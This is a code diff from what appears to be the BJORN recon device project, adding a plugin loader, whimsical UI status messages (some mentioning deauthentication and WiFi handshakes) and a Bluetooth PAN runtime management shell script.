'motivated': MOTIVATED,
'demotivated': DEMOTIVATED,
'friend': FRIEND,
'broken': BROKEN,
'debug': DEBUG,
'smart': SMART,
}
def load_from_config(config):
"""Override faces from config dict (e.g. custom emojis)."""
for face_name, face_value in (config or {}).items():
key = face_name.upper()
if key in globals():
globals()[key] = face_value
lower = face_name.lower()
if lower in MOOD_FACES:
MOOD_FACES[lower] = face_value

198
bifrost/plugins.py Normal file
View File

@@ -0,0 +1,198 @@
"""
Bifrost — Plugin system.
Ported from pwnagotchi/plugins/__init__.py with ThreadPoolExecutor.
Compatible with existing pwnagotchi plugin files.
"""
import os
import glob
import threading
import importlib
import importlib.util
import logging
import concurrent.futures
from logger import Logger
logger = Logger(name="bifrost.plugins", level=logging.DEBUG)
default_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "plugins")
loaded = {}
database = {}
locks = {}
_executor = concurrent.futures.ThreadPoolExecutor(
max_workers=4, thread_name_prefix="BifrostPlugin"
)
class Plugin:
"""Base class for Bifrost/Pwnagotchi plugins.
Subclasses are auto-registered via __init_subclass__.
"""
__author__ = 'unknown'
__version__ = '0.0.0'
__license__ = 'GPL3'
__description__ = ''
__name__ = ''
__help__ = ''
__dependencies__ = []
__defaults__ = {}
def __init__(self):
self.options = {}
@classmethod
def __init_subclass__(cls, **kwargs):
super().__init_subclass__(**kwargs)
global loaded, locks
plugin_name = cls.__module__.split('.')[0]
plugin_instance = cls()
logger.debug("loaded plugin %s as %s", plugin_name, plugin_instance)
loaded[plugin_name] = plugin_instance
for attr_name in dir(plugin_instance):
if attr_name.startswith('on_'):
cb = getattr(plugin_instance, attr_name, None)
if cb is not None and callable(cb):
locks["%s::%s" % (plugin_name, attr_name)] = threading.Lock()
def toggle_plugin(name, enable=True):
"""Enable or disable a plugin at runtime. Returns True if state changed."""
global loaded, database
if not enable and name in loaded:
try:
if hasattr(loaded[name], 'on_unload'):
loaded[name].on_unload()
except Exception as e:
logger.warning("Error unloading plugin %s: %s", name, e)
del loaded[name]
return True
if enable and name in database and name not in loaded:
try:
load_from_file(database[name])
if name in loaded:
one(name, 'loaded')
return True
except Exception as e:
logger.warning("Error loading plugin %s: %s", name, e)
return False
def on(event_name, *args, **kwargs):
"""Dispatch event to ALL loaded plugins."""
for plugin_name in list(loaded.keys()):
one(plugin_name, event_name, *args, **kwargs)
def _locked_cb(lock_name, cb, *args, **kwargs):
"""Execute callback under its per-plugin lock."""
global locks
if lock_name not in locks:
locks[lock_name] = threading.Lock()
with locks[lock_name]:
cb(*args, **kwargs)
def one(plugin_name, event_name, *args, **kwargs):
"""Dispatch event to a single plugin (thread-safe)."""
global loaded
if plugin_name in loaded:
plugin = loaded[plugin_name]
cb_name = 'on_%s' % event_name
callback = getattr(plugin, cb_name, None)
if callback is not None and callable(callback):
try:
lock_name = "%s::%s" % (plugin_name, cb_name)
_executor.submit(_locked_cb, lock_name, callback, *args, **kwargs)
except Exception as e:
logger.error("error running %s.%s: %s", plugin_name, cb_name, e)
def load_from_file(filename):
"""Load a single plugin file."""
logger.debug("loading %s", filename)
plugin_name = os.path.basename(filename.replace(".py", ""))
spec = importlib.util.spec_from_file_location(plugin_name, filename)
instance = importlib.util.module_from_spec(spec)
spec.loader.exec_module(instance)
return plugin_name, instance
def load_from_path(path, enabled=()):
"""Scan a directory for plugins, load enabled ones."""
global loaded, database
if not path or not os.path.isdir(path):
return loaded
logger.debug("loading plugins from %s — enabled: %s", path, enabled)
for filename in glob.glob(os.path.join(path, "*.py")):
plugin_name = os.path.basename(filename.replace(".py", ""))
database[plugin_name] = filename
if plugin_name in enabled:
try:
load_from_file(filename)
except Exception as e:
logger.warning("error loading %s: %s", filename, e)
return loaded
def load(config):
"""Load plugins from default + custom paths based on config."""
plugins_cfg = config.get('bifrost_plugins', {})
enabled = [
name for name, opts in plugins_cfg.items()
if isinstance(opts, dict) and opts.get('enabled', False)
]
# Load from default path (bifrost/plugins/)
if os.path.isdir(default_path):
load_from_path(default_path, enabled=enabled)
# Load from custom path
custom_path = config.get('bifrost_plugins_path', '')
if custom_path and os.path.isdir(custom_path):
load_from_path(custom_path, enabled=enabled)
# Propagate options
for name, plugin in loaded.items():
if name in plugins_cfg:
plugin.options = plugins_cfg[name]
on('loaded')
on('config_changed', config)
def get_loaded_info():
"""Return list of loaded plugin info dicts for web API."""
result = []
for name, plugin in loaded.items():
result.append({
'name': name,
'enabled': True,
'author': getattr(plugin, '__author__', 'unknown'),
'version': getattr(plugin, '__version__', '0.0.0'),
'description': getattr(plugin, '__description__', ''),
})
# Also include known-but-not-loaded plugins
for name, path in database.items():
if name not in loaded:
result.append({
'name': name,
'enabled': False,
'author': '',
'version': '',
'description': '',
})
return result
def shutdown():
"""Clean shutdown of plugin system."""
_executor.shutdown(wait=False)

155
bifrost/voice.py Normal file
View File

@@ -0,0 +1,155 @@
"""
Bifrost — Voice / status messages.
Ported from pwnagotchi/voice.py, uses random choice for personality.
"""
import random
class BifrostVoice:
"""Returns random contextual messages for the Bifrost UI."""
def on_starting(self):
return random.choice([
"Hi, I'm Bifrost! Starting ...",
"New day, new hunt, new pwns!",
"Hack the Planet!",
"Initializing WiFi recon ...",
])
def on_ready(self):
return random.choice([
"Ready to roll!",
"Let's find some handshakes!",
"WiFi recon active.",
])
def on_ai_ready(self):
return random.choice([
"AI ready.",
"The neural network is ready.",
])
def on_normal(self):
return random.choice(['', '...'])
def on_free_channel(self, channel):
return f"Hey, channel {channel} is free!"
def on_bored(self):
return random.choice([
"I'm bored ...",
"Let's go for a walk!",
"Nothing interesting around here ...",
])
def on_motivated(self, reward):
return "This is the best day of my life!"
def on_demotivated(self, reward):
return "Shitty day :/"
def on_sad(self):
return random.choice([
"I'm extremely bored ...",
"I'm very sad ...",
"I'm sad",
"...",
])
def on_angry(self):
return random.choice([
"...",
"Leave me alone ...",
"I'm mad at you!",
])
def on_excited(self):
return random.choice([
"I'm living the life!",
"I pwn therefore I am.",
"So many networks!!!",
"I'm having so much fun!",
"My crime is that of curiosity ...",
])
def on_new_peer(self, peer_name, first_encounter=False):
if first_encounter:
return f"Hello {peer_name}! Nice to meet you."
return random.choice([
f"Yo {peer_name}! Sup?",
f"Hey {peer_name} how are you doing?",
f"Unit {peer_name} is nearby!",
])
def on_lost_peer(self, peer_name):
return random.choice([
f"Uhm ... goodbye {peer_name}",
f"{peer_name} is gone ...",
])
def on_miss(self, who):
return random.choice([
f"Whoops ... {who} is gone.",
f"{who} missed!",
"Missed!",
])
def on_grateful(self):
return random.choice([
"Good friends are a blessing!",
"I love my friends!",
])
def on_lonely(self):
return random.choice([
"Nobody wants to play with me ...",
"I feel so alone ...",
"Where's everybody?!",
])
def on_napping(self, secs):
return random.choice([
f"Napping for {secs}s ...",
"Zzzzz",
f"ZzzZzzz ({secs}s)",
])
def on_shutdown(self):
return random.choice(["Good night.", "Zzz"])
def on_awakening(self):
return random.choice(["...", "!"])
def on_waiting(self, secs):
return random.choice([
f"Waiting for {secs}s ...",
"...",
f"Looking around ({secs}s)",
])
def on_assoc(self, ap_name):
return random.choice([
f"Hey {ap_name} let's be friends!",
f"Associating to {ap_name}",
f"Yo {ap_name}!",
])
def on_deauth(self, sta_mac):
return random.choice([
f"Just decided that {sta_mac} needs no WiFi!",
f"Deauthenticating {sta_mac}",
f"Kickbanning {sta_mac}!",
])
def on_handshakes(self, new_shakes):
s = 's' if new_shakes > 1 else ''
return f"Cool, we got {new_shakes} new handshake{s}!"
def on_rebooting(self):
return "Oops, something went wrong ... Rebooting ..."
def on_epoch(self, epoch_num):
return random.choice([
f"Epoch {epoch_num} complete.",
f"Finished epoch {epoch_num}.",
])

821
bjorn_bluetooth.sh Normal file
View File

@@ -0,0 +1,821 @@
#!/bin/bash
# bjorn_bluetooth.sh
# Runtime manager for the BJORN Bluetooth PAN stack
# Usage:
# ./bjorn_bluetooth.sh -u Bring Bluetooth PAN services up
# ./bjorn_bluetooth.sh -d Bring Bluetooth PAN services down
# ./bjorn_bluetooth.sh -r Reset Bluetooth PAN services
# ./bjorn_bluetooth.sh -l Show detailed Bluetooth status
# ./bjorn_bluetooth.sh -s Scan nearby Bluetooth devices
# ./bjorn_bluetooth.sh -p Launch pairing assistant
# ./bjorn_bluetooth.sh -c Connect now to configured target
# ./bjorn_bluetooth.sh -t Trust a known device
# ./bjorn_bluetooth.sh -x Disconnect current PAN session
# ./bjorn_bluetooth.sh -f Forget/remove a known device
# ./bjorn_bluetooth.sh -h Show help
#
# Notes:
# This script no longer installs or removes Bluetooth PAN.
# Installation is handled by the BJORN installer.
# This tool is for runtime diagnostics, pairing, trust, connect, and recovery.
set -u
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
BLUE='\033[0;34m'
CYAN='\033[0;36m'
NC='\033[0m'
SCRIPT_VERSION="2.0"
BJORN_USER="bjorn"
BT_SETTINGS_DIR="/home/${BJORN_USER}/.settings_bjorn"
BT_CONFIG="${BT_SETTINGS_DIR}/bt.json"
AUTO_BT_SCRIPT="/usr/local/bin/auto_bt_connect.py"
AUTO_BT_SERVICE="auto_bt_connect.service"
BLUETOOTH_SERVICE="bluetooth.service"
LOG_DIR="/var/log/bjorn_install"
LOG_FILE="$LOG_DIR/bjorn_bluetooth_$(date +%Y%m%d_%H%M%S).log"
mkdir -p "$LOG_DIR" 2>/dev/null || true
touch "$LOG_FILE" 2>/dev/null || true
log() {
local level="$1"
shift
local message="[$(date '+%Y-%m-%d %H:%M:%S')] [$level] $*"
local color="$NC"
case "$level" in
ERROR) color="$RED" ;;
SUCCESS) color="$GREEN" ;;
WARNING) color="$YELLOW" ;;
INFO) color="$BLUE" ;;
SECTION) color="$CYAN" ;;
esac
printf '%s\n' "$message" >> "$LOG_FILE" 2>/dev/null || true
printf '%b%s%b\n' "$color" "$message" "$NC"
}
print_divider() {
printf '%b%s%b\n' "$CYAN" "============================================================" "$NC"
}
ensure_root() {
if [ "$(id -u)" -ne 0 ]; then
log "ERROR" "This command must be run as root. Please use sudo."
exit 1
fi
}
service_exists() {
systemctl list-unit-files --type=service 2>/dev/null | grep -q "^$1"
}
service_active() {
systemctl is-active --quiet "$1"
}
service_enabled() {
systemctl is-enabled --quiet "$1"
}
bnep0_exists() {
ip link show bnep0 >/dev/null 2>&1
}
wait_for_condition() {
local description="$1"
local attempts="$2"
shift 2
local i=1
while [ "$i" -le "$attempts" ]; do
if "$@"; then
log "SUCCESS" "$description"
return 0
fi
log "INFO" "Waiting for $description ($i/$attempts)..."
sleep 1
i=$((i + 1))
done
log "WARNING" "$description not reached after ${attempts}s"
return 1
}
show_recent_logs() {
if command -v journalctl >/dev/null 2>&1; then
if service_exists "$AUTO_BT_SERVICE"; then
log "INFO" "Recent ${AUTO_BT_SERVICE} logs:"
journalctl -u "$AUTO_BT_SERVICE" -n 20 --no-pager 2>/dev/null || true
fi
if service_exists "$BLUETOOTH_SERVICE"; then
log "INFO" "Recent ${BLUETOOTH_SERVICE} logs:"
journalctl -u "$BLUETOOTH_SERVICE" -n 10 --no-pager 2>/dev/null || true
fi
fi
}
run_btctl() {
local output
output="$(printf '%s\n' "$@" "quit" | bluetoothctl 2>&1)"
printf '%s\n' "$output" >> "$LOG_FILE" 2>/dev/null || true
printf '%s\n' "$output"
}
bluetooth_power_on() {
ensure_root
if ! service_active "$BLUETOOTH_SERVICE"; then
log "INFO" "Starting ${BLUETOOTH_SERVICE}..."
systemctl start "$BLUETOOTH_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to start ${BLUETOOTH_SERVICE}"
return 1
}
fi
run_btctl "power on" >/dev/null
run_btctl "agent on" >/dev/null
run_btctl "default-agent" >/dev/null
return 0
}
ensure_bt_settings_dir() {
mkdir -p "$BT_SETTINGS_DIR" >> "$LOG_FILE" 2>&1 || return 1
chown "$BJORN_USER:$BJORN_USER" "$BT_SETTINGS_DIR" >> "$LOG_FILE" 2>&1 || true
}
get_configured_mac() {
if [ ! -f "$BT_CONFIG" ]; then
return 1
fi
sed -n 's/.*"device_mac"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$BT_CONFIG" | head -n1
}
write_configured_mac() {
local mac="$1"
ensure_bt_settings_dir || {
log "ERROR" "Failed to create ${BT_SETTINGS_DIR}"
return 1
}
cat > "$BT_CONFIG" <<EOF
{
"device_mac": "$mac"
}
EOF
chown "$BJORN_USER:$BJORN_USER" "$BT_CONFIG" >> "$LOG_FILE" 2>&1 || true
chmod 644 "$BT_CONFIG" >> "$LOG_FILE" 2>&1 || true
log "SUCCESS" "Updated auto-connect target in ${BT_CONFIG}: ${mac:-<empty>}"
return 0
}
device_info() {
local mac="$1"
bluetoothctl info "$mac" 2>/dev/null
}
device_flag() {
local mac="$1"
local key="$2"
device_info "$mac" | sed -n "s/^[[:space:]]*${key}:[[:space:]]*//p" | head -n1
}
device_name() {
local mac="$1"
local name
name="$(device_info "$mac" | sed -n 's/^[[:space:]]*Name:[[:space:]]*//p' | head -n1)"
if [ -z "$name" ]; then
name="$(bluetoothctl devices 2>/dev/null | sed -n "s/^Device ${mac} //p" | head -n1)"
fi
printf '%s\n' "${name:-Unknown device}"
}
load_devices() {
local mode="${1:-all}"
local source_cmd="devices"
local line mac name
DEVICE_MACS=()
DEVICE_NAMES=()
if [ "$mode" = "paired" ]; then
source_cmd="paired-devices"
fi
while IFS= read -r line; do
mac="$(printf '%s\n' "$line" | sed -n 's/^Device \([0-9A-F:]\{17\}\) .*/\1/p')"
name="$(printf '%s\n' "$line" | sed -n 's/^Device [0-9A-F:]\{17\} \(.*\)$/\1/p')"
if [ -n "$mac" ]; then
DEVICE_MACS+=("$mac")
DEVICE_NAMES+=("${name:-Unknown device}")
fi
done < <(bluetoothctl "$source_cmd" 2>/dev/null)
}
print_device_list() {
local configured_mac="${1:-}"
local i status paired trusted connected
if [ "${#DEVICE_MACS[@]}" -eq 0 ]; then
log "WARNING" "No devices found"
return 1
fi
for ((i=0; i<${#DEVICE_MACS[@]}; i++)); do
paired="$(device_flag "${DEVICE_MACS[$i]}" "Paired")"
trusted="$(device_flag "${DEVICE_MACS[$i]}" "Trusted")"
connected="$(device_flag "${DEVICE_MACS[$i]}" "Connected")"
status=""
[ "$paired" = "yes" ] && status="${status} paired"
[ "$trusted" = "yes" ] && status="${status} trusted"
[ "$connected" = "yes" ] && status="${status} connected"
[ "${DEVICE_MACS[$i]}" = "$configured_mac" ] && status="${status} configured"
printf '%b[%d]%b %s %s%b%s%b\n' "$BLUE" "$((i + 1))" "$NC" "${DEVICE_MACS[$i]}" "${DEVICE_NAMES[$i]}" "$YELLOW" "${status:- new}" "$NC"
done
return 0
}
select_device() {
local mode="${1:-all}"
local configured_mac choice index
configured_mac="$(get_configured_mac 2>/dev/null || true)"
load_devices "$mode"
if [ "${#DEVICE_MACS[@]}" -eq 0 ]; then
if [ "$mode" = "all" ]; then
log "WARNING" "No known devices yet. Run a scan first."
else
log "WARNING" "No paired devices found."
fi
return 1
fi
print_divider
log "SECTION" "Select a Bluetooth device"
print_device_list "$configured_mac" || return 1
echo -n -e "${GREEN}Choose a device number (or 0 to cancel): ${NC}"
read -r choice
if [ -z "$choice" ] || [ "$choice" = "0" ]; then
log "INFO" "Selection cancelled"
return 1
fi
if ! [[ "$choice" =~ ^[0-9]+$ ]]; then
log "ERROR" "Invalid selection"
return 1
fi
index=$((choice - 1))
if [ "$index" -lt 0 ] || [ "$index" -ge "${#DEVICE_MACS[@]}" ]; then
log "ERROR" "Selection out of range"
return 1
fi
SELECTED_DEVICE_MAC="${DEVICE_MACS[$index]}"
SELECTED_DEVICE_NAME="${DEVICE_NAMES[$index]}"
log "INFO" "Selected ${SELECTED_DEVICE_NAME} (${SELECTED_DEVICE_MAC})"
return 0
}
scan_bluetooth_devices() {
ensure_root
local duration="${1:-12}"
print_divider
log "SECTION" "Scanning nearby Bluetooth devices"
print_divider
bluetooth_power_on || return 1
log "INFO" "Scanning for ${duration} seconds..."
timeout "${duration}s" bluetoothctl scan on >> "$LOG_FILE" 2>&1 || true
run_btctl "scan off" >/dev/null
log "SUCCESS" "Scan complete"
load_devices all
print_device_list "$(get_configured_mac 2>/dev/null || true)" || true
}
pair_device() {
local mac="$1"
local output
bluetooth_power_on || return 1
log "INFO" "Pairing with ${mac}..."
output="$(run_btctl "pair ${mac}")"
if printf '%s\n' "$output" | grep -qi "Pairing successful"; then
log "SUCCESS" "Pairing successful for ${mac}"
return 0
fi
if [ "$(device_flag "$mac" "Paired")" = "yes" ]; then
log "INFO" "Device ${mac} is already paired"
return 0
fi
log "ERROR" "Pairing failed for ${mac}"
printf '%s\n' "$output"
return 1
}
trust_device() {
local mac="$1"
local output
bluetooth_power_on || return 1
log "INFO" "Trusting ${mac}..."
output="$(run_btctl "trust ${mac}")"
if printf '%s\n' "$output" | grep -qi "trust succeeded"; then
log "SUCCESS" "Trust succeeded for ${mac}"
return 0
fi
if [ "$(device_flag "$mac" "Trusted")" = "yes" ]; then
log "INFO" "Device ${mac} is already trusted"
return 0
fi
log "ERROR" "Trust failed for ${mac}"
printf '%s\n' "$output"
return 1
}
disconnect_pan_session() {
ensure_root
local configured_mac="${1:-}"
print_divider
log "SECTION" "Disconnecting Bluetooth PAN"
print_divider
if service_exists "$AUTO_BT_SERVICE" && service_active "$AUTO_BT_SERVICE"; then
log "INFO" "Stopping ${AUTO_BT_SERVICE} to prevent immediate reconnect"
systemctl stop "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || log "WARNING" "Failed to stop ${AUTO_BT_SERVICE}"
fi
if bnep0_exists; then
log "INFO" "Releasing DHCP lease on bnep0"
dhclient -r bnep0 >> "$LOG_FILE" 2>&1 || true
ip link set bnep0 down >> "$LOG_FILE" 2>&1 || true
else
log "INFO" "bnep0 is not present"
fi
pkill -f "bt-network -c" >> "$LOG_FILE" 2>&1 || true
pkill -f "bt-network" >> "$LOG_FILE" 2>&1 || true
if [ -n "$configured_mac" ]; then
log "INFO" "Requesting Bluetooth disconnect for ${configured_mac}"
run_btctl "disconnect ${configured_mac}" >/dev/null || true
fi
bnep0_exists && log "WARNING" "bnep0 still exists after disconnect" || log "SUCCESS" "Bluetooth PAN session is down"
}
connect_to_target_now() {
ensure_root
local mac="$1"
local previous_mac
if [ -z "$mac" ]; then
log "ERROR" "No target MAC specified"
return 1
fi
print_divider
log "SECTION" "Connecting Bluetooth PAN now"
print_divider
bluetooth_power_on || return 1
if [ "$(device_flag "$mac" "Paired")" != "yes" ]; then
log "WARNING" "Target ${mac} is not paired yet"
fi
if [ "$(device_flag "$mac" "Trusted")" != "yes" ]; then
log "WARNING" "Target ${mac} is not trusted yet"
fi
previous_mac="$(get_configured_mac 2>/dev/null || true)"
write_configured_mac "$mac" || return 1
disconnect_pan_session "$previous_mac" || true
if service_exists "$AUTO_BT_SERVICE"; then
log "INFO" "Restarting ${AUTO_BT_SERVICE}"
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || true
systemctl restart "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to restart ${AUTO_BT_SERVICE}"
show_recent_logs
return 1
}
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
return 1
fi
wait_for_condition "${AUTO_BT_SERVICE} to become active" 10 service_active "$AUTO_BT_SERVICE" || true
wait_for_condition "bnep0 to appear" 15 bnep0_exists || true
if bnep0_exists; then
log "SUCCESS" "Bluetooth PAN link is up on bnep0"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "bnep0 is still missing. Pairing/trust may be OK but PAN did not come up yet."
show_recent_logs
fi
}
set_auto_connect_target() {
ensure_root
if ! select_device all; then
return 1
fi
write_configured_mac "$SELECTED_DEVICE_MAC"
}
pairing_assistant() {
ensure_root
print_divider
log "SECTION" "Bluetooth pairing assistant"
print_divider
scan_bluetooth_devices 12 || true
if ! select_device all; then
return 1
fi
pair_device "$SELECTED_DEVICE_MAC" || return 1
trust_device "$SELECTED_DEVICE_MAC" || return 1
write_configured_mac "$SELECTED_DEVICE_MAC" || return 1
echo -n -e "${GREEN}Connect to this device now for PAN? [Y/n]: ${NC}"
read -r answer
case "${answer:-Y}" in
n|N)
log "INFO" "Pairing assistant completed without immediate PAN connect"
;;
*)
connect_to_target_now "$SELECTED_DEVICE_MAC"
;;
esac
}
forget_device() {
ensure_root
local configured_mac output
configured_mac="$(get_configured_mac 2>/dev/null || true)"
if ! select_device all; then
return 1
fi
if [ "$SELECTED_DEVICE_MAC" = "$configured_mac" ]; then
log "WARNING" "This device is currently configured as the auto-connect target"
disconnect_pan_session "$SELECTED_DEVICE_MAC" || true
write_configured_mac ""
fi
log "INFO" "Removing ${SELECTED_DEVICE_NAME} (${SELECTED_DEVICE_MAC}) from BlueZ"
output="$(run_btctl "remove ${SELECTED_DEVICE_MAC}")"
if printf '%s\n' "$output" | grep -qi "Device has been removed"; then
log "SUCCESS" "Device removed"
return 0
fi
if ! bluetoothctl devices 2>/dev/null | grep -q "$SELECTED_DEVICE_MAC"; then
log "SUCCESS" "Device no longer appears in known devices"
return 0
fi
log "ERROR" "Failed to remove device"
printf '%s\n' "$output"
return 1
}
trust_selected_device() {
ensure_root
if ! select_device all; then
return 1
fi
trust_device "$SELECTED_DEVICE_MAC"
}
list_bluetooth_status() {
local configured_mac controller_info paired trusted connected
print_divider
log "SECTION" "BJORN Bluetooth PAN Status"
print_divider
controller_info="$(run_btctl "show")"
configured_mac="$(get_configured_mac 2>/dev/null || true)"
if service_exists "$BLUETOOTH_SERVICE"; then
service_active "$BLUETOOTH_SERVICE" && log "SUCCESS" "${BLUETOOTH_SERVICE} is active" || log "WARNING" "${BLUETOOTH_SERVICE} is not active"
service_enabled "$BLUETOOTH_SERVICE" && log "SUCCESS" "${BLUETOOTH_SERVICE} is enabled at boot" || log "WARNING" "${BLUETOOTH_SERVICE} is not enabled at boot"
else
log "ERROR" "${BLUETOOTH_SERVICE} is not installed"
fi
if service_exists "$AUTO_BT_SERVICE"; then
service_active "$AUTO_BT_SERVICE" && log "SUCCESS" "${AUTO_BT_SERVICE} is active" || log "WARNING" "${AUTO_BT_SERVICE} is not active"
service_enabled "$AUTO_BT_SERVICE" && log "SUCCESS" "${AUTO_BT_SERVICE} is enabled at boot" || log "WARNING" "${AUTO_BT_SERVICE} is not enabled at boot"
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
fi
[ -f "$AUTO_BT_SCRIPT" ] && log "SUCCESS" "${AUTO_BT_SCRIPT} exists" || log "ERROR" "${AUTO_BT_SCRIPT} is missing"
[ -f "$BT_CONFIG" ] && log "SUCCESS" "${BT_CONFIG} exists" || log "WARNING" "${BT_CONFIG} is missing"
if printf '%s\n' "$controller_info" | grep -q "Powered: yes"; then
log "SUCCESS" "Bluetooth controller is powered on"
else
log "WARNING" "Bluetooth controller is not powered on"
fi
if [ -n "$configured_mac" ]; then
log "INFO" "Configured auto-connect target: ${configured_mac} ($(device_name "$configured_mac"))"
paired="$(device_flag "$configured_mac" "Paired")"
trusted="$(device_flag "$configured_mac" "Trusted")"
connected="$(device_flag "$configured_mac" "Connected")"
log "INFO" "Configured target state: paired=${paired:-unknown}, trusted=${trusted:-unknown}, connected=${connected:-unknown}"
else
log "WARNING" "No auto-connect target configured in ${BT_CONFIG}"
fi
if bnep0_exists; then
log "SUCCESS" "bnep0 interface exists"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "bnep0 interface is not present"
fi
print_divider
log "SECTION" "Known Devices"
load_devices all
print_device_list "$configured_mac" || true
print_divider
log "SECTION" "Quick Recovery Hints"
log "INFO" "Use -p for the pairing assistant"
log "INFO" "Use -c to connect now to the configured target"
log "INFO" "Use -r to reset Bluetooth PAN if bnep0 is stuck"
log "INFO" "Follow logs with: sudo journalctl -u ${AUTO_BT_SERVICE} -f"
}
bring_bluetooth_pan_up() {
ensure_root
local configured_mac
print_divider
log "SECTION" "Bringing Bluetooth PAN up"
print_divider
bluetooth_power_on || return 1
configured_mac="$(get_configured_mac 2>/dev/null || true)"
if [ -z "$configured_mac" ]; then
log "WARNING" "No configured target in ${BT_CONFIG}"
log "INFO" "Use the pairing assistant (-p) or set a target from the menu"
fi
if service_exists "$AUTO_BT_SERVICE"; then
systemctl daemon-reload >> "$LOG_FILE" 2>&1 || true
systemctl start "$AUTO_BT_SERVICE" >> "$LOG_FILE" 2>&1 || {
log "ERROR" "Failed to start ${AUTO_BT_SERVICE}"
show_recent_logs
return 1
}
log "SUCCESS" "Start command sent to ${AUTO_BT_SERVICE}"
else
log "ERROR" "${AUTO_BT_SERVICE} is not installed"
return 1
fi
wait_for_condition "${AUTO_BT_SERVICE} to become active" 10 service_active "$AUTO_BT_SERVICE" || true
if [ -n "$configured_mac" ]; then
wait_for_condition "bnep0 to appear" 15 bnep0_exists || true
fi
if bnep0_exists; then
log "SUCCESS" "Bluetooth PAN is up on bnep0"
ip -brief addr show bnep0 2>/dev/null || true
else
log "WARNING" "Bluetooth PAN is not up yet"
fi
}
bring_bluetooth_pan_down() {
ensure_root
local configured_mac
print_divider
log "SECTION" "Bringing Bluetooth PAN down"
print_divider
configured_mac="$(get_configured_mac 2>/dev/null || true)"
disconnect_pan_session "$configured_mac"
}
reset_bluetooth_pan() {
ensure_root
print_divider
log "SECTION" "Resetting Bluetooth PAN"
print_divider
bring_bluetooth_pan_down || log "WARNING" "Down phase reported an issue, continuing"
log "INFO" "Waiting 2 seconds before restart"
sleep 2
bring_bluetooth_pan_up
}
show_usage() {
echo -e "${GREEN}Usage: $0 [OPTIONS]${NC}"
echo -e "Options:"
echo -e " ${BLUE}-u${NC} Bring Bluetooth PAN services up"
echo -e " ${BLUE}-d${NC} Bring Bluetooth PAN services down"
echo -e " ${BLUE}-r${NC} Reset Bluetooth PAN services"
echo -e " ${BLUE}-l${NC} Show detailed Bluetooth status"
echo -e " ${BLUE}-s${NC} Scan nearby Bluetooth devices"
echo -e " ${BLUE}-p${NC} Launch pairing assistant"
echo -e " ${BLUE}-c${NC} Connect now to configured target"
echo -e " ${BLUE}-t${NC} Trust a known device"
echo -e " ${BLUE}-x${NC} Disconnect current PAN session"
echo -e " ${BLUE}-f${NC} Forget/remove a known device"
echo -e " ${BLUE}-h${NC} Show this help message"
echo -e ""
echo -e "Examples:"
echo -e " $0 -p Scan, pair, trust, set target, and optionally connect now"
echo -e " $0 -u Start Bluetooth and the auto PAN reconnect service"
echo -e " $0 -r Reset a stuck bnep0/PAN session"
echo -e " $0 -f Forget a previously paired device"
echo -e ""
echo -e "${YELLOW}This script no longer installs or removes Bluetooth PAN.${NC}"
echo -e "${YELLOW}That part is handled by the BJORN installer.${NC}"
if [ "${1:-exit}" = "return" ]; then
return 0
fi
exit 0
}
display_main_menu() {
while true; do
clear
print_divider
echo -e "${CYAN} BJORN Bluetooth Runtime Manager v${SCRIPT_VERSION}${NC}"
print_divider
echo -e "${BLUE} 1.${NC} Show Bluetooth PAN status"
echo -e "${BLUE} 2.${NC} Bring Bluetooth PAN up"
echo -e "${BLUE} 3.${NC} Bring Bluetooth PAN down"
echo -e "${BLUE} 4.${NC} Reset Bluetooth PAN"
echo -e "${BLUE} 5.${NC} Scan nearby Bluetooth devices"
echo -e "${BLUE} 6.${NC} Pairing assistant"
echo -e "${BLUE} 7.${NC} Connect now to configured target"
echo -e "${BLUE} 8.${NC} Set/change auto-connect target"
echo -e "${BLUE} 9.${NC} Trust a known device"
echo -e "${BLUE}10.${NC} Disconnect current PAN session"
echo -e "${BLUE}11.${NC} Forget/remove a known device"
echo -e "${BLUE}12.${NC} Show help"
echo -e "${BLUE}13.${NC} Exit"
echo -e ""
echo -e "${YELLOW}Note:${NC} installation/removal is no longer handled here."
echo -n -e "${GREEN}Choose an option (1-13): ${NC}"
read -r choice
case "$choice" in
1)
list_bluetooth_status
echo ""
read -r -p "Press Enter to return to the menu..."
;;
2)
bring_bluetooth_pan_up
echo ""
read -r -p "Press Enter to return to the menu..."
;;
3)
bring_bluetooth_pan_down
echo ""
read -r -p "Press Enter to return to the menu..."
;;
4)
reset_bluetooth_pan
echo ""
read -r -p "Press Enter to return to the menu..."
;;
5)
scan_bluetooth_devices 12
echo ""
read -r -p "Press Enter to return to the menu..."
;;
6)
pairing_assistant
echo ""
read -r -p "Press Enter to return to the menu..."
;;
7)
connect_to_target_now "$(get_configured_mac 2>/dev/null || true)"
echo ""
read -r -p "Press Enter to return to the menu..."
;;
8)
set_auto_connect_target
echo ""
read -r -p "Press Enter to return to the menu..."
;;
9)
trust_selected_device
echo ""
read -r -p "Press Enter to return to the menu..."
;;
10)
disconnect_pan_session "$(get_configured_mac 2>/dev/null || true)"
echo ""
read -r -p "Press Enter to return to the menu..."
;;
11)
forget_device
echo ""
read -r -p "Press Enter to return to the menu..."
;;
12)
show_usage return
echo ""
read -r -p "Press Enter to return to the menu..."
;;
13)
log "INFO" "Exiting BJORN Bluetooth Runtime Manager"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1 and 13."
sleep 2
;;
esac
done
}
while getopts ":udrlspctxfh" opt; do
case "$opt" in
u)
bring_bluetooth_pan_up
exit $?
;;
d)
bring_bluetooth_pan_down
exit $?
;;
r)
reset_bluetooth_pan
exit $?
;;
l)
list_bluetooth_status
exit 0
;;
s)
scan_bluetooth_devices 12
exit $?
;;
p)
pairing_assistant
exit $?
;;
c)
connect_to_target_now "$(get_configured_mac 2>/dev/null || true)"
exit $?
;;
t)
trust_selected_device
exit $?
;;
x)
disconnect_pan_session "$(get_configured_mac 2>/dev/null || true)"
exit $?
;;
f)
forget_device
exit $?
;;
h)
show_usage
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
